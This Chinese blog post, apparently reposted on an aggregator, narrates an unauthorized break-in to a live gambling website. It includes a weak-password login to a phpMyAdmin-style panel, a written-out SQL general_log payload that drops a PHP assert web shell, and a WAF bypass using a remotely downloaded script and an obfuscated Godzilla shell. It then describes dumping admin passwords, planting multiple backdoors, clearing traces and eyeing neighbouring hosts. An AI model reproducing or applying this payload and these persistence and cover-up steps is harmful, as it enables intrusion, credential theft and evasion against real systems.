实战|简单绕过waf拿下赌博网站
確定目標(biāo)
收集信息
x.x.x.x首先常規(guī)測(cè)試方法一頓懟,目錄掃描,端口掃描,js文件,中間件,指紋識(shí)別,反正該上的都上。。。
隨手加個(gè)路徑,報(bào)錯(cuò)了,當(dāng)看到這個(gè)界面我瞬間就有思路了
為什么這么說呢,因?yàn)橹拔揖团鲆娺^這樣的網(wǎng)站報(bào)錯(cuò),這是一個(gè)php集成環(huán)境,叫upupw,跟phpstudy是一樣的
upupw? --> pmd
phpstudy --> phpmyadmin
突破點(diǎn)
這個(gè)集成環(huán)境包也有個(gè)phpinfo的頁(yè)面,跟數(shù)據(jù)庫(kù)管理界面
u.php?
測(cè)試一下弱口令
root/root?
連接成功后就可以看到phpinfo的頁(yè)面
好了現(xiàn)在問題變成phpmyadmin拿shell
getshell
三步拿shell
set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/cmd.php' SELECT '<?php assert($_POST["cmd"]);?>';當(dāng)執(zhí)行第三步的時(shí)候頁(yè)面卡在執(zhí)行中。。。沒有反應(yīng) 瞬間感覺不對(duì),可能存在waf
換了個(gè)免殺馬試試,先寫到txt里邊看看成功與否
沒有任何問題,下面直接寫入php文件
?
可以寫入,直接去連接shell
果然有waf,當(dāng)時(shí)寫入的時(shí)候就感覺到了,不免殺的shell,sql語句執(zhí)行不了
繞過waf
懟了半天都不知道是什么鬼waf,用下載文件試試
為了避免攔截php代碼的waf,我這里遠(yuǎn)程下載的腳本是利用JavaScript轉(zhuǎn)寫php
訪問11.php 就會(huì)生成shell.php
這里的shell也是用了哥斯拉的免殺shell
嘗試了這么多次
進(jìn)程里沒有waf進(jìn)程
權(quán)限是system
脫源碼
上傳抓密碼工具,直接獲取管理密碼,登上服務(wù)器
?
?
留后門,清理痕跡
多留幾個(gè)后門,萬一被刪
?
這個(gè)網(wǎng)段還有這么多機(jī)器
源碼
打開源碼才發(fā)現(xiàn)waf是360webscan
?
?
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來咯,堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)總結(jié)
以上是生活随笔為你收集整理的实战|简单绕过waf拿下赌博网站的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 某公司邮件系统的安全检测
- 下一篇: Python进阶 -- 3.处理CSV格